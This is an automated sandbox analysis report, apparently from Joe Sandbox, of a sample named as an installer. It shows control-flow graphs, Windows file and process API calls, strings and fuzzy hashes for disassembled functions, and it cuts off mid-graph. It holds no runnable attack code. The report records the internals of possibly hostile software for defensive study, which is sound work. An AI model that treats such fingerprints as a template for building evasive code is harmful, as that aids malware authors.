                            control_flow_graph 3722 6c1101c3-6c1101d3 3723 6c1101d5-6c1101e8 call 6c1030cf call 6c1030bc 3722->3723 3724 6c1101ed-6c1101ef 3722->3724 3738 6c11056c 3723->3738 3725 6c1101f5-6c1101fb 3724->3725 3726 6c110554-6c110561 call 6c1030cf call 6c1030bc 3724->3726 3725->3726 3729 6c110201-6c110227 3725->3729 3743 6c110567 call 6c103810 3726->3743 3729->3726 3732 6c11022d-6c110236 3729->3732 3736 6c110250-6c110252 3732->3736 3737 6c110238-6c11024b call 6c1030cf call 6c1030bc 3732->3737 3741 6c110550-6c110552 3736->3741 3742 6c110258-6c11025b 3736->3742 3737->3743 3744 6c11056f-6c110572 3738->3744 3741->3744 3742->3741 3746 6c110261-6c110265 3742->3746 3743->3738 3746->3737 3749 6c110267-6c11027e 3746->3749 3751 6c110280-6c110283 3749->3751 3752 6c1102cf-6c1102d5 3749->3752 3755 6c110293-6c110299 3751->3755 3756 6c110285-6c11028e 3751->3756 3753 6c1102d7-6c1102e1 3752->3753 3754 6c11029b-6c1102b2 call 6c1030cf call 6c1030bc call 6c103810 3752->3754 3760 6c1102e3-6c1102e5 3753->3760 3761 6c1102e8-6c110306 call 6c107ee5 call 6c107eab * 2 3753->3761 3788 6c110487 3754->3788 3755->3754 3758 6c1102b7-6c1102ca 3755->3758 3757 6c110353-6c110363 3756->3757 3763 6c110369-6c110375 3757->3763 3764 6c110428-6c110431 call 6c1150d5 3757->3764 3758->3757 3760->3761 3792 6c110323-6c11034c call 6c10e359 3761->3792 3793 6c110308-6c11031e call 6c1030bc call 6c1030cf 3761->3793 3763->3764 3768 6c11037b-6c11037d 3763->3768 3776 6c110433-6c110445 3764->3776 3777 6c1104a4 3764->3777 3768->3764 3772 6c110383-6c1103a7 3768->3772 3772->3764 3778 6c1103a9-6c1103bf 3772->3778 3776->3777 3783 6c110447-6c110456 GetConsoleMode 3776->3783 3781 6c1104a8-6c1104c0 ReadFile 3777->3781 3778->3764 3779 6c1103c1-6c1103c3 3778->3779 3779->3764 3784 6c1103c5-6c1103eb 3779->3784 3786 6c1104c2-6c1104c8 3781->3786 3787 6c11051c-6c110527 GetLastError 3781->3787 3783->3777 3789 6c110458-6c11045c 3783->3789 3784->3764 3791 6c1103ed-6c110403 3784->3791 3786->3787 3796 6c1104ca 3786->3796 3794 6c110540-6c110543 3787->3794 3795 6c110529-6c11053b call 6c1030bc call 6c1030cf 3787->3795 3790 6c11048a-6c110494 call 6c107eab 3788->3790 3789->3781 3797 6c11045e-6c110478 ReadConsoleW 3789->3797 3790->3744 3791->3764 3799 6c110405-6c110407 3791->3799 3792->3757 3793->3788 3806 6c110480-6c110486 call 6c1030e2 3794->3806 3807 6c110549-6c11054b 3794->3807 3795->3788 3803 6c1104cd-6c1104df 3796->3803 3804 6c110499-6c1104a2 3797->3804 3805 6c11047a GetLastError 3797->3805 3799->3764 3809 6c110409-6c110423 3799->3809 3803->3790 3813 6c1104e1-6c1104e5 3803->3813 3804->3803 3805->3806 3806->3788 3807->3790 3809->3764 3817 6c1104e7-6c1104f7 call 6c1105ee 3813->3817 3818 6c1104fe-6c110509 3813->3818 3830 6c1104fa-6c1104fc 3817->3830 3820 6c110515-6c11051a call 6c1108a6 3818->3820 3821 6c11050b call 6c110573 3818->3821 3828 6c110510-6c110513 3820->3828 3821->3828 3828->3830 3830->3790
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8Q
                            • API String ID: 0-4022487301
                            • Opcode ID: 4f6e1a1ce35c884c8daa9742a2abb40c24cfba8a2b6483217b6e6deb67b3f2f1
                            • Instruction ID: cdd0268a701f3f9f975d7b4337111d4e55fecd59ad083c7b6f54f896efefe6da
                            • Opcode Fuzzy Hash: 4f6e1a1ce35c884c8daa9742a2abb40c24cfba8a2b6483217b6e6deb67b3f2f1
                            • Instruction Fuzzy Hash: 45C1D370E09289DFEF01CF99D880BADBBB0AF4A318F104169E514ABF81C779D955CB61
                            Function 6C11775C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3831 6c11775c-6c11778c call 6c117bdc 3834 6c1177a7-6c1177b3 call 6c114cfc 3831->3834 3835 6c11778e-6c117799 call 6c1030cf 3831->3835 3841 6c1177b5-6c1177ca call 6c1030cf call 6c1030bc 3834->3841 3842 6c1177cc-6c117815 call 6c117b47 3834->3842 3840 6c11779b-6c1177a2 call 6c1030bc 3835->3840 3852 6c117a81-6c117a85 3840->3852 3841->3840 3850 6c117882-6c11788b GetFileType 3842->3850 3851 6c117817-6c117820 3842->3851 3856 6c1178d4-6c1178d7 3850->3856 3857 6c11788d-6c1178be GetLastError call 6c1030e2 CloseHandle 3850->3857 3854 6c117822-6c117826 3851->3854 3855 6c117857-6c11787d GetLastError call 6c1030e2 3851->3855 3854->3855 3860 6c117828-6c117855 call 6c117b47 3854->3860 3855->3840 3858 6c1178e0-6c1178e6 3856->3858 3859 6c1178d9-6c1178de 3856->3859 3857->3840 3868 6c1178c4-6c1178cf call 6c1030bc 3857->3868 3864 6c1178ea-6c117938 call 6c114ea0 3858->3864 3865 6c1178e8 3858->3865 3859->3864 3860->3850 3860->3855 3874 6c117957-6c11797f call 6c117e00 3864->3874 3875 6c11793a-6c117946 call 6c117d56 3864->3875 3865->3864 3868->3840 3880 6c117981-6c117982 3874->3880 3881 6c117984-6c1179c5 3874->3881 3875->3874 3882 6c117948 3875->3882 3883 6c11794a-6c117952 call 6c10f015 3880->3883 3884 6c1179c7-6c1179cb 3881->3884 3885 6c1179e6-6c1179f4 3881->3885 3882->3883 3883->3852 3884->3885 3887 6c1179cd-6c1179e1 3884->3887 3888 6c1179fa-6c1179fe 3885->3888 3889 6c117a7f 3885->3889 3887->3885 3888->3889 3891 6c117a00-6c117a33 CloseHandle call 6c117b47 3888->3891 3889->3852 3894 6c117a35-6c117a61 GetLastError call 6c1030e2 call 6c114e0f 3891->3894 3895 6c117a67-6c117a7b 3891->3895 3894->3895 3895->3889
                            APIs
                              • Part of subcall function 6C117B47: CreateFileW.KERNEL32(00000000,00000000,?,6C117805,?,?,00000000,?,6C117805,00000000,0000000C), ref: 6C117B64
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C117870
                            • __dosmaperr.LIBCMT ref: 6C117877
                            • GetFileType.KERNEL32(00000000), ref: 6C117883
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C11788D
                            • __dosmaperr.LIBCMT ref: 6C117896
                            • CloseHandle.KERNEL32(00000000), ref: 6C1178B6
                            • CloseHandle.KERNEL32(6C10E7C0), ref: 6C117A03
                            • GetLastError.KERNEL32 ref: 6C117A35
                            • __dosmaperr.LIBCMT ref: 6C117A3C
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: 8Q
                            • API String ID: 4237864984-4022487301
                            • Opcode ID: 48c96b67648e8e634aab6eb3d02f78c05b923e3c3dc6417d53fdf89cf62ca245
                            • Instruction ID: bf085ce7743e974dbdef7e8e97f50c7381c9de6df0ee68d695fc1550a839e3ad
                            • Opcode Fuzzy Hash: 48c96b67648e8e634aab6eb3d02f78c05b923e3c3dc6417d53fdf89cf62ca245
                            • Instruction Fuzzy Hash: E0A14B31A081158FDF09DF68DC51BAD7BB1AB07328F18416EE811EFB90DB398916C791
                            Function 6C0CB4D0 Relevance: 16.6, APIs: 3, Strings: 6, Instructions: 834fileCOMMON
                            Download Yara Rule
                            APIs
                            • WriteFile.KERNEL32(?,?,00000038,?,00000000), ref: 6C0CB62F
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: FileWrite
                            • String ID: *$,=ym$-=ym$-=ym$B$H
                            • API String ID: 3934441357-3163594065
                            • Opcode ID: 62b52d34b9d52a484f5d74cefc312c46e56836fbed96c56006fb1c6df4eb16b3
                            • Instruction ID: 4d64c19721b749ff8c89568c4090ef0e204bf0f969b8935788e793eb37fb44ae
                            • Opcode Fuzzy Hash: 62b52d34b9d52a484f5d74cefc312c46e56836fbed96c56006fb1c6df4eb16b3
                            • Instruction Fuzzy Hash: 27727AB46093459FCB24CF28C49075EBBE1AF99304F688E1EE499CBB50E774D8858B53
                            Function 6BF74200 Relevance: 9.0, APIs: 3, Strings: 1, Instructions: 2005COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;T55
                            • API String ID: 0-2572755013
                            • Opcode ID: 8958540c19bac4381f6eee4b3c03ab74f366ef33e3bff7a4abfadbef642e1020
                            • Instruction ID: b4fb4e2a9d1fc7c9f0f14a69c8c5f5a2f3a36f543bb7167ae03e0235fd72cfb4
                            • Opcode Fuzzy Hash: 8958540c19bac4381f6eee4b3c03ab74f366ef33e3bff7a4abfadbef642e1020
                            • Instruction Fuzzy Hash: B403B332644B018FC728CF28C8D0695B7F3EFD53247598E6DC0AA4B6A5DB78B54ACB50
                            Function 6C0F86E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62processsynchronizationCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4469 6c0f86e0-6c0f8767 CreateProcessA 4470 6c0f878b-6c0f8794 4469->4470 4471 6c0f8796-6c0f879b 4470->4471 4472 6c0f87b0-6c0f87fa WaitForSingleObject CloseHandle * 2 4470->4472 4473 6c0f879d-6c0f87a2 4471->4473 4474 6c0f8770-6c0f8783 4471->4474 4472->4470 4473->4470 4475 6c0f87a4-6c0f8807 4473->4475 4474->4470
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CloseHandle$CreateObjectProcessSingleWait
                            • String ID: D
                            • API String ID: 2059082233-2746444292
                            • Opcode ID: ecf5a498d7c0c87b24bc92acf62352ea5526dd5ebb2bb9df3c716a677b73656b
                            • Instruction ID: ff895f80bf8e19facb5373f2b01a89ce1d0a7c3b11409773fe55f4ce94b8170a
                            • Opcode Fuzzy Hash: ecf5a498d7c0c87b24bc92acf62352ea5526dd5ebb2bb9df3c716a677b73656b
                            • Instruction Fuzzy Hash: 8931C1718193808FD740DF29D18875ABBF0AB9A318F505A1EF8E996360D774D5C5CB83
                            Function 6C10F34E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177fileCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4477 6c10f34e-6c10f36a 4478 6c10f370-6c10f372 4477->4478 4479 6c10f529 4477->4479 4480 6c10f394-6c10f3b5 4478->4480 4481 6c10f374-6c10f387 call 6c1030cf call 6c1030bc call 6c103810 4478->4481 4482 6c10f52b-6c10f52f 4479->4482 4483 6c10f3b7-6c10f3ba 4480->4483 4484 6c10f3bc-6c10f3c2 4480->4484 4499 6c10f38c-6c10f38f 4481->4499 4483->4484 4486 6c10f3c4-6c10f3c9 4483->4486 4484->4481 4484->4486 4488 6c10f3da-6c10f3eb call 6c10f530 4486->4488 4489 6c10f3cb-6c10f3d7 call 6c10e359 4486->4489 4497 6c10f42c-6c10f43e 4488->4497 4498 6c10f3ed-6c10f3ef 4488->4498 4489->4488 4500 6c10f440-6c10f449 4497->4500 4501 6c10f485-6c10f4a7 WriteFile 4497->4501 4502 6c10f3f1-6c10f3f9 4498->4502 4503 6c10f416-6c10f422 call 6c10f5a1 4498->4503 4499->4482 4507 6c10f475-6c10f483 call 6c10f9b3 4500->4507 4508 6c10f44b-6c10f44e 4500->4508 4504 6c10f4b2 4501->4504 4505 6c10f4a9-6c10f4af GetLastError 4501->4505 4509 6c10f4bb-6c10f4be 4502->4509 4510 6c10f3ff-6c10f40c call 6c10f94b 4502->4510 4511 6c10f427-6c10f42a 4503->4511 4512 6c10f4b5-6c10f4ba 4504->4512 4505->4504 4507->4511 4514 6c10f450-6c10f453 4508->4514 4515 6c10f465-6c10f473 call 6c10fb77 4508->4515 4513 6c10f4c1-6c10f4c6 4509->4513 4518 6c10f40f-6c10f411 4510->4518 4511->4518 4512->4509 4519 6c10f524-6c10f527 4513->4519 4520 6c10f4c8-6c10f4cd 4513->4520 4514->4513 4521 6c10f455-6c10f463 call 6c10fa8e 4514->4521 4515->4511 4518->4512 4519->4482 4525 6c10f4f9-6c10f505 4520->4525 4526 6c10f4cf-6c10f4d4 4520->4526 4521->4511 4529 6c10f507-6c10f50a 4525->4529 4530 6c10f50c-6c10f51f call 6c1030bc call 6c1030cf 4525->4530 4531 6c10f4d6-6c10f4e8 call 6c1030bc call 6c1030cf 4526->4531 4532 6c10f4ed-6c10f4f4 call 6c1030e2 4526->4532 4529->4479 4529->4530 4530->4499 4531->4499 4532->4499
                            APIs
                              • Part of subcall function 6C10F5A1: GetConsoleCP.KERNEL32(?,6C10E7C0,?), ref: 6C10F5E9
                            • WriteFile.KERNEL32(?,?,6C117DDC,00000000,00000000,?,00000000,00000000,6C1191A6,00000000,00000000,?,00000000,6C10E7C0,6C117DDC,00000000), ref: 6C10F49F
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C117DDC,6C10E7C0,00000000,?,?,?,?,00000000,?), ref: 6C10F4A9
                            • __dosmaperr.LIBCMT ref: 6C10F4EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ConsoleErrorFileLastWrite__dosmaperr
                            • String ID: 8Q
                            • API String ID: 251514795-4022487301
                            • Opcode ID: 16fe2a92ef330bde504979592888da5c7b2c40bbba89c67e14d7dc1d8a84db31
                            • Instruction ID: 59f39b07a0643d32e326c7273edf1d5e33010bcb9d337eb01e5bb339bcf3f4b8
                            • Opcode Fuzzy Hash: 16fe2a92ef330bde504979592888da5c7b2c40bbba89c67e14d7dc1d8a84db31
                            • Instruction Fuzzy Hash: 6451D671B0120AABEB00CFA4C842BDE7BB9EF0A318F144555E920ABA51DF74D945C769
                            Function 6C0F9280 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 142COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4544 6c0f9280-6c0f928c 4545 6c0f928e-6c0f9299 4544->4545 4546 6c0f92cd 4544->4546 4548 6c0f92af-6c0f92bc call 6bfc01f0 call 6c104208 4545->4548 4549 6c0f929b-6c0f92ad 4545->4549 4547 6c0f92cf-6c0f9347 4546->4547 4550 6c0f9349-6c0f9371 4547->4550 4551 6c0f9373-6c0f9379 4547->4551 4557 6c0f92c1-6c0f92cb 4548->4557 4549->4548 4550->4551 4554 6c0f937a-6c0f9439 call 6bfc2250 call 6bfc2340 call 6c0fca69 call 6bfbe010 call 6c0fa778 4550->4554 4557->4547
                            APIs
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0F9421
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Ios_base_dtorstd::ios_base::_
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 323602529-1866435925
                            • Opcode ID: d42b2f0751b5ffeb52a113cc2d875ff5d89ff945a6f245f1e28e92de72ff9eeb
                            • Instruction ID: 97e57a01bb4450c2ffd2ac5c79a160a4904f5666417eaecfc4c3420687e204b0
                            • Opcode Fuzzy Hash: d42b2f0751b5ffeb52a113cc2d875ff5d89ff945a6f245f1e28e92de72ff9eeb
                            • Instruction Fuzzy Hash: 9A5134B5A00B008FD725CF29C485B97BBF1FB49318F408A2DD89647B90D779B94ACB90
                            Function 6C0CCEA0 Relevance: 6.2, APIs: 4, Instructions: 187fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4567 6c0ccea0-6c0ccf03 call 6c0fa260 4570 6c0ccf40-6c0ccf49 4567->4570 4571 6c0ccf4b-6c0ccf50 4570->4571 4572 6c0ccf90-6c0ccf95 4570->4572 4573 6c0ccf56-6c0ccf5b 4571->4573 4574 6c0cd000-6c0cd005 4571->4574 4575 6c0ccf9b-6c0ccfa0 4572->4575 4576 6c0cd030-6c0cd035 4572->4576 4581 6c0cd065-6c0cd08c 4573->4581 4582 6c0ccf61-6c0ccf66 4573->4582 4577 6c0cd00b-6c0cd010 4574->4577 4578 6c0cd125-6c0cd158 call 6c0fea90 4574->4578 4583 6c0ccf05-6c0ccf21 WriteFile 4575->4583 4584 6c0ccfa6-6c0ccfab 4575->4584 4579 6c0cd17d-6c0cd191 4576->4579 4580 6c0cd03b-6c0cd040 4576->4580 4586 6c0cd15d-6c0cd175 4577->4586 4587 6c0cd016-6c0cd01b 4577->4587 4578->4570 4596 6c0cd195-6c0cd1a2 4579->4596 4588 6c0cd046-6c0cd060 4580->4588 4589 6c0cd1a7-6c0cd1ac 4580->4589 4592 6c0ccf33-6c0ccf38 4581->4592 4590 6c0ccf6c-6c0ccf71 4582->4590 4591 6c0cd091-6c0cd0aa WriteFile 4582->4591 4585 6c0ccf30 4583->4585 4594 6c0cd0af-6c0cd120 WriteFile 4584->4594 4595 6c0ccfb1-6c0ccfb6 4584->4595 4585->4592 4586->4579 4587->4570 4598 6c0cd021-6c0cd02b 4587->4598 4588->4596 4589->4570 4597 6c0cd1b2-6c0cd1c0 4589->4597 4590->4570 4599 6c0ccf73-6c0ccf86 4590->4599 4591->4585 4592->4570 4594->4585 4595->4570 4601 6c0ccfb8-6c0ccfee call 6c0ff010 ReadFile 4595->4601 4596->4570 4598->4585 4599->4592 4601->4585
                            APIs
                            • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C0CCFE1
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 5e587585f60da44735f15efb681ea5f4a19bbadb30eac545da832cb9db970a4b
                            • Instruction ID: 136ee7061a8c4dc59d3c2600e679f337d2460cd1de3cb6640d441a516eddce44
                            • Opcode Fuzzy Hash: 5e587585f60da44735f15efb681ea5f4a19bbadb30eac545da832cb9db970a4b
                            • Instruction Fuzzy Hash: 8C7137B0249340AFD710DF28C884B9EBBF4BF89708F50492EF494C66A0E375D9858B83
                            Function 6C0CC390 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 631COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4626 6c0cc390-6c0cc406 call 6c0fa260 call 6c0ff010 4631 6c0cc426-6c0cc42f 4626->4631 4632 6c0cc490-6c0cc495 4631->4632 4633 6c0cc431-6c0cc436 4631->4633 4634 6c0cc49b-6c0cc4a0 4632->4634 4635 6c0cc570-6c0cc575 4632->4635 4636 6c0cc43c-6c0cc441 4633->4636 4637 6c0cc500-6c0cc505 4633->4637 4638 6c0cc638-6c0cc63d 4634->4638 4639 6c0cc4a6-6c0cc4ab 4634->4639 4640 6c0cc57b-6c0cc580 4635->4640 4641 6c0cc6d6-6c0cc6db 4635->4641 4642 6c0cc5bf-6c0cc5c4 4636->4642 4643 6c0cc447-6c0cc44c 4636->4643 4644 6c0cc679-6c0cc67e 4637->4644 4645 6c0cc50b-6c0cc510 4637->4645 4658 6c0cc8ab-6c0cc8b0 4638->4658 4659 6c0cc643-6c0cc648 4638->4659 4648 6c0cc796-6c0cc79b 4639->4648 4649 6c0cc4b1-6c0cc4b6 4639->4649 4650 6c0cc586-6c0cc58b 4640->4650 4651 6c0cc830-6c0cc835 4640->4651 4652 6c0cc6e1-6c0cc6e6 4641->4652 4653 6c0cc912-6c0cc917 4641->4653 4654 6c0cc5ca-6c0cc5cf 4642->4654 4655 6c0cc863-6c0cc868 4642->4655 4656 6c0cc742-6c0cc747 4643->4656 4657 6c0cc452-6c0cc457 4643->4657 4646 6c0cc684-6c0cc689 4644->4646 4647 6c0cc8e2-6c0cc8e7 4644->4647 4660 6c0cc7de-6c0cc7e3 4645->4660 4661 6c0cc516-6c0cc51b 4645->4661 4666 6c0cc68f-6c0cc694 4646->4666 4667 6c0ccb61-6c0ccb85 4646->4667 4664 6c0cc8ed-6c0cc8f2 4647->4664 4665 6c0ccdf9-6c0cce12 4647->4665 4678 6c0cc408-6c0cc418 4648->4678 4679 6c0cc7a1-6c0cc7a6 4648->4679 4668 6c0cc4bc-6c0cc4c1 4649->4668 4669 6c0cc97a-6c0cc984 4649->4669 4680 6c0cc9fe-6c0cca3a 4650->4680 4681 6c0cc591-6c0cc596 4650->4681 4684 6c0ccd6c-6c0ccd88 4651->4684 4685 6c0cc83b-6c0cc840 4651->4685 4672 6c0cc6ec-6c0cc6f1 4652->4672 4673 6c0ccc12-6c0ccc4d call 6c0ff010 call 6c0cb4d0 4652->4673 4670 6c0cc91d-6c0cc922 4653->4670 4671 6c0cce1a-6c0cce29 4653->4671 4686 6c0cc5d5-6c0cc5da 4654->4686 4687 6c0cca71-6c0cca9b call 6c0fea90 4654->4687 4688 6c0cc86e-6c0cc873 4655->4688 4689 6c0ccdb7-6c0ccdbf 4655->4689 4674 6c0cc74d-6c0cc752 4656->4674 4675 6c0ccca3-6c0cccba 4656->4675 4690 6c0cc93d-6c0cc95b 4657->4690 4691 6c0cc45d-6c0cc462 4657->4691 4662 6c0ccdda-6c0ccdf1 4658->4662 4663 6c0cc8b6-6c0cc8bb 4658->4663 4692 6c0cc64e-6c0cc653 4659->4692 4693 6c0ccb08-6c0ccb34 4659->4693 4682 6c0cc7e9-6c0cc7ee 4660->4682 4683 6c0cccfa-6c0ccd23 4660->4683 4676 6c0cc521-6c0cc526 4661->4676 4677 6c0cc9a3-6c0cc9b3 4661->4677 4662->4665 4663->4631 4716 6c0cc8c1-6c0cc8dd 4663->4716 4664->4631 4717 6c0cc8f8-6c0cc90d 4664->4717 4665->4671 4696 6c0ccb8a-6c0ccc0d 4666->4696 4697 6c0cc69a-6c0cc69f 4666->4697 4667->4631 4718 6c0cc989-6c0cc99e 4668->4718 4719 6c0cc4c7-6c0cc4cc 4668->4719 4669->4631 4670->4631 4720 6c0cc928-6c0cc938 4670->4720 4713 6c0cce31-6c0cce36 4671->4713 4699 6c0ccc77-6c0ccc88 4672->4699 4700 6c0cc6f7-6c0cc6fc 4672->4700 4751 6c0ccc52-6c0ccc72 4673->4751 4702 6c0cc758-6c0cc75d 4674->4702 